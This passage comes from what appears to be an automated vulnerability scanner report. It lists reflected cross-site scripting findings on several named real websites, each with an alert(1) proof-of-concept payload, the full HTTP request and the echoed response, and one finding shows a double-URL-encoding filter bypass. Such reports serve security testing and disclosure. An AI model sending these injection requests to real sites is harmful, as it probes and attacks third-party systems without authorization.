X-Cnection: close
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server, Enterprise Edition
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Thu, 21 Apr 2011 02:32:03 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: LocaleCookie=en-us; expires=Wed, 21-Apr-2021 02:32:03 GMT; path=/
Set-Cookie: CookieState=V=1; path=/
Set-Cookie: BIGipServerwww.gamestop.com-80=550114476.20480.0000; path=/
Content-Length: 181766

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >

<script language='jav
...[SNIP]...
<a href='/Profiles/Login.aspx?ReturnUrl=/Minimal404Handler.ashx?404;http://www.gamestop.com/common/gui/favicon.ico1d615'a='b'34949f6bd8' id='header_auth_actions' rel='nofollow'>
...[SNIP]...

3.29. http://www.invokemedia.com/company/contact-us/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.invokemedia.com
Path:	/company/contact-us/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9236d"><script>alert(1)</script>9efa30deb70 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9236d\"><script>alert(1)</script>9efa30deb70 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /company/contact-us/?9236d"><script>alert(1)</script>9efa30deb70=1 HTTP/1.1
Host: www.invokemedia.com
Proxy-Connection: keep-alive
Referer: http://www.invokemedia.com/services/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=117773137.1303403484.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bqCiwBmalmafCsjq=bfpFakBlzAAnkyCi; SJECT=CKON; __utma=117773137.26858761.1303403484.1303403484.1303403484.1; __utmc=117773137; __utmb=117773137.2.10.1303403484

Response

HTTP/1.1 200 OK
Date: Thu, 21 Apr 2011 16:43:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.10-2ubuntu6
X-Pingback: http://www.invokemedia.com/xmlrpc.php
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21143

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<form id="wpsf_contact_form" name="wpsf_contact_form" action="/company/contact-us/?9236d\"><script>alert(1)</script>9efa30deb70=1&form=response" method="post" style="text-align:left;" >
...[SNIP]...

3.30. http://www.manta.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.manta.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9418f"><script>alert(1)</script>606648fbb62 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico9418f"><script>alert(1)</script>606648fbb62 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.manta.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 403 Access Denied
Server: nginx/0.7.62
Date: Thu, 21 Apr 2011 04:21:18 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 4718
X-Varnish: 3271893409
Via: 1.1 varnish
X-Served-By: ecnext41
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="mailto:webmaster@ecnext.com?subject=403 error&body=Access Denied: http://www.manta.com/favicon.ico9418f"><script>alert(1)</script>606648fbb62 at Thu Apr 21 04:21:18 2011 +0000 from 173.193.214.243">
...[SNIP]...

3.31. http://www.manta.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.manta.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e08d8<script>alert(1)</script>d862bca9ec1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoe08d8<script>alert(1)</script>d862bca9ec1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.manta.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 403 Access Denied
Server: nginx/0.7.62
Date: Thu, 21 Apr 2011 04:21:18 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 4714
X-Varnish: 3271893413
Via: 1.1 varnish
X-Served-By: ecnext41
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<br>
Access Denied: http://www.manta.com/favicon.icoe08d8<script>alert(1)</script>d862bca9ec1 at Thu Apr 21 04:21:18 2011 +0000 from 173.193.214.243<br>
...[SNIP]...

3.32. http://www.manta.com/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.manta.com
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab548"><script>alert(1)</script>161d2c9c2b5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?ab548"><script>alert(1)</script>161d2c9c2b5=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.manta.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 403 Access Denied
Server: nginx/0.7.62
Date: Thu, 21 Apr 2011 04:20:51 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 4724
X-Varnish: 2519603023
Via: 1.1 varnish
X-Served-By: ecnext42
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="mailto:webmaster@ecnext.com?subject=403 error&body=Access Denied: http://www.manta.com/favicon.ico?ab548"><script>alert(1)</script>161d2c9c2b5=1 at Thu Apr 21 04:20:51 2011 +0000 from 173.193.214.243">
...[SNIP]...

3.33. http://www.manta.com/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.manta.com
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1e8b7<script>alert(1)</script>629ea3689dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?1e8b7<script>alert(1)</script>629ea3689dd=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.manta.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 403 Access Denied
Server: nginx/0.7.62
Date: Thu, 21 Apr 2011 04:20:51 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 4720
X-Varnish: 1640430012
Via: 1.1 varnish
X-Served-By: ecnext43
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<br>
Access Denied: http://www.manta.com/favicon.ico?1e8b7<script>alert(1)</script>629ea3689dd=1 at Thu Apr 21 04:20:51 2011 +0000 from 173.193.214.243<br>
...[SNIP]...

3.34. http://www.mayoclinic.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mayoclinic.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b3e5c%2527%253balert%25281%2529%252f%252fd818a3e0a4d was submitted in the REST URL parameter 1. This input was echoed as b3e5c';alert(1)//d818a3e0a4d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /favicon.icob3e5c%2527%253balert%25281%2529%252f%252fd818a3e0a4d HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mayoclinic.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 file not found
Connection: close
Date: Thu, 21 Apr 2011 04:46:47 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: CFID=58374322;domain=.mayoclinic.com;expires=Sat, 13-Apr-2041 04:46:47 GMT;path=/
Set-Cookie: CFTOKEN=45263782;domain=.mayoclinic.com;expires=Sat, 13-Apr-2041 04:46:47 GMT;path=/
Set-Cookie: JSESSIONID=8030439029825330a4a738587873181a3af3;path=/
Set-Cookie: CURRENTFARCRYPROJECT=dotcom;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>

   <title>Page not found - MayoClinic.com</title>
   <meta name="description" conten
...[SNIP]...
';
   OAS_listpos = 'Bottom,Position4';
   OAS_query = 'E1ED5C92-F149-7785-66979D84200611F0=ObjectID&E1ED5C92-F149-7785-66979D84200611F0=pl&mcPage=type&404=ID&1?404;http://www.mayoclinic.com:80/favicon.icob3e5c';alert(1)//d818a3e0a4d=B404';
   OAS_target = '_top';
   //end of configuration
   OAS_version = 10;
   OAS_rn = '001234567890'; OAS_rns = '1234567890';
   OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
   fun
...[SNIP]...

3.35. http://www.mayoclinic.com/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mayoclinic.com
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72587"-alert(1)-"dfa492204da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /favicon.ico?72587"-alert(1)-"dfa492204da=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mayoclinic.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 file not found
Connection: close
Date: Thu, 21 Apr 2011 04:46:15 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: CFID=58374299;domain=.mayoclinic.com;expires=Sat, 13-Apr-2041 04:46:15 GMT;path=/
Set-Cookie: CFTOKEN=95558526;domain=.mayoclinic.com;expires=Sat, 13-Apr-2041 04:46:15 GMT;path=/
Set-Cookie: JSESSIONID=80305d0618a043f6d14e5233a588674f4617;path=/
Set-Cookie: CURRENTFARCRYPROJECT=dotcom;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>

<title>Page not found - MayoClinic.com</title>
<meta name="description" conten
...[SNIP]...
<script>
COMSCORE.beacon({
c1:2,
c2:"6035818",
c3:"6035818",
c4:"http://www.mayoclinic.com/invoke.cfm?b404=1?404;http://www.mayoclinic.com:80/favicon.ico?72587"-alert(1)-"dfa492204da=1",
c5:"",
c6:"",
c15:""
});
</script>
...[SNIP]...

3.36. http://www.mayoclinic.com/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mayoclinic.com
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3393a'%3balert(1)//6b1eeb83196 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3393a';alert(1)//6b1eeb83196 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /favicon.ico?3393a'%3balert(1)//6b1eeb83196=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mayoclinic.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 file not found
Connection: close
Date: Thu, 21 Apr 2011 04:46:16 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: CFID=58176610;domain=.mayoclinic.com;expires=Sat, 13-Apr-2041 04:46:16 GMT;path=/
Set-Cookie: CFTOKEN=69936412;domain=.mayoclinic.com;expires=Sat, 13-Apr-2041 04:46:16 GMT;path=/
Set-Cookie: JSESSIONID=4830cd880f46724576c0f53196c2d2ef2c5c;path=/
Set-Cookie: CURRENTFARCRYPROJECT=dotcom;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>

   <title>Page not found - MayoClinic.com</title>
   <meta name="description" conten
...[SNIP]...
0611F0';
   OAS_listpos = 'Bottom,Position4';
   OAS_query = 'E1ED5C92-F149-7785-66979D84200611F0=ObjectID&E1ED5C92-F149-7785-66979D84200611F0=pl&mcPage=type&1?404;http://www.mayoclinic.com:80/favicon.ico?3393a';alert(1)//6b1eeb83196=1=B404&404=ID';
   OAS_target = '_top';
   //end of configuration
   OAS_version = 10;
   OAS_rn = '001234567890'; OAS_rns = '1234567890';
   OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2,
...[SNIP]...

3.37. http://www.outcastacademy.com/webmasteroutcast.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.outcastacademy.com
Path:	/webmasteroutcast.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 8b920%3balert(1)//9fe262cab34 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8b920;alert(1)//9fe262cab34 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /webmasteroutcast.php?weblink=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000011)%3C/scrip/8b920%3balert(1)//9fe262cab34t%3E HTTP/1.1
Host: www.outcastacademy.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=159873187.1760510559.1303394665.1303394665.1303394665.1; __utmb=159873187; __utmz=159873187.1303394665.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Thu, 21 Apr 2011 13:50:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Set-Cookie: PHPSESSID=2b514622a6029acbab3f7f74a43801e0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 8607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Outcast Academy Aff
...[SNIP]...
</scrip/8b920;alert(1)//9fe262cab34t>
...[SNIP]...

3.38. http://www.outcastacademy.com/webmasteroutcast.php [weblink parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.outcastacademy.com
Path:	/webmasteroutcast.php

Issue detail

The value of the weblink request parameter is copied into the HTML document as plain text between tags. The payload 2ac7e<script>alert(1)</script>bf93eddcaa2 was submitted in the weblink parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /webmasteroutcast.php?weblink=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000011)%3C/script%3E2ac7e<script>alert(1)</script>bf93eddcaa2 HTTP/1.1
Host: www.outcastacademy.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=159873187.1760510559.1303394665.1303394665.1303394665.1; __utmb=159873187; __utmz=159873187.1303394665.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Thu, 21 Apr 2011 13:48:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Set-Cookie: PHPSESSID=6a612c855e03e7f45b3036013284f30c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 8633

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Outcast Academy Aff
...[SNIP]...
</script>2ac7e<script>alert(1)</script>bf93eddcaa2" name="weblink" />
...[SNIP]...

3.39. http://www.outcastacademy.com/webmasteroutcast.php [weblink parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.outcastacademy.com
Path:	/webmasteroutcast.php

Issue detail

The value of the weblink request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94ad4"><script>alert(1)</script>0253b95865d was submitted in the weblink parameter. This input was echoed as 94ad4\"><script>alert(1)</script>0253b95865d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /webmasteroutcast.php?weblink=94ad4"><script>alert(1)</script>0253b95865d HTTP/1.1
Host: www.outcastacademy.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=159873187.1760510559.1303394665.1303394665.1303394665.1; __utmb=159873187; __utmz=159873187.1303394665.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Thu, 21 Apr 2011 13:48:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Set-Cookie: PHPSESSID=fd598cfe00572aeeb46156090fbf2a90; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 8517

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Outcast Academy Aff
...[SNIP]...
<input type="edit" value="94ad4\"><script>alert(1)</script>0253b95865d" name="weblink" />
...[SNIP]...

3.40. http://www.shangri-la.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.shangri-la.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8bac'%3ba2fa4762627 was submitted in the REST URL parameter 1. This input was echoed as b8bac';a2fa4762627 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /favicon.icob8bac'%3ba2fa4762627 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.shangri-la.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-WebServer-By: WEB02
X-Powered-By: ASP.NET
Access-Control-Allow-Origin: http://www.shangri-la.com
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 15288
Vary: Accept-Encoding
Cache-Control: private, max-age=60
Date: Thu, 21 Apr 2011 02:21:05 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpr
...[SNIP]...
<script type="text/javascript">
   var share_page_data={};
   share_page_data.page_url = 'http://www.shangri-la.com/Error404.aspx?404;http://www.shangri-la.com:80/favicon.icob8bac';a2fa4762627';
   share_page_data.page_name = "Page Not Found";
</script>
...[SNIP]...

3.41. http://www.theatlantic.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.theatlantic.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d976c"%3be1f74ba20aa was submitted in the REST URL parameter 1. This input was echoed as d976c";e1f74ba20aa in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /d976c"%3be1f74ba20aa HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.theatlantic.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Thu, 21 Apr 2011 02:22:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.12
Content-Length: 70856

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
   "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
   <!--
...[SNIP]...
next lines. */
               s.server="www.theatlantic.com"
               s.channel="static"
                               s.pageType="errorPage";
               /* skipping pageName for 404s */

               s.prop3="404 error - static - n/a"

               s.prop4="/d976c";e1f74ba20aa/"


                               s.prop6="static"
               s.prop7="static"
               s.prop8="static"


                                                                               s.hier1="static"

               s.prop23="regular"
               s.prop24="regular"
               s.prop25="regular"
               s
...[SNIP]...

3.42. http://www.trails.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.trails.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 20fa8'-alert(1)-'e862738cd21 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /favicon.ico20fa8'-alert(1)-'e862738cd21 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.trails.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 21532
Expires: Thu, 21 Apr 2011 02:20:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 21 Apr 2011 02:20:30 GMT
Connection: close
Set-Cookie: ASP.NET_SessionId=r2b0nonvoeyirlniz1t4qt55; domain=.trails.com; path=/; HttpOnly

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpr
...[SNIP]...
ails.com',
                   jscdn: 'http://cdn-www.trails.com',
                   logout: 'https://ssl.trails.com/logout.aspx',
                   login: 'https://ssl.trails.com/login.aspx?r=http%3a%2f%2fwww.trails.com%3a80%2ffavicon.ico20fa8'-alert(1)-'e862738cd21',
                   signup: 'https://ssl.trails.com/subscribe.aspx',
                   account: 'https://ssl.trails.com/myaccount/',
                   profile: 'http://www.trails.com/mytrails/?p=profile'
               },
               user: {
                   name:
...[SNIP]...

3.43. http://www.umbra.com/local/pressimages/index.php/%22%20stYle=%22x:expre/**/ssion(netsparker(9)) [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.umbra.com
Path:	/local/pressimages/index.php/%22%20stYle=%22x:expre//ssion(netsparker(9))**

Issue detail

The value of REST URL parameter 4 is copied into the name of an HTML tag attribute. The payload dbdd8><script>alert(1)</script>aebc7dde785 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /local/pressimages/index.php/%22%20stYledbdd8><script>alert(1)</script>aebc7dde785=%22x:expre/**/ssion(netsparker(9)) HTTP/1.1
Host: www.umbra.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 21 Apr 2011 02:43:14 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=vt9gkiiqrv1f81tekk1o93bbn2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
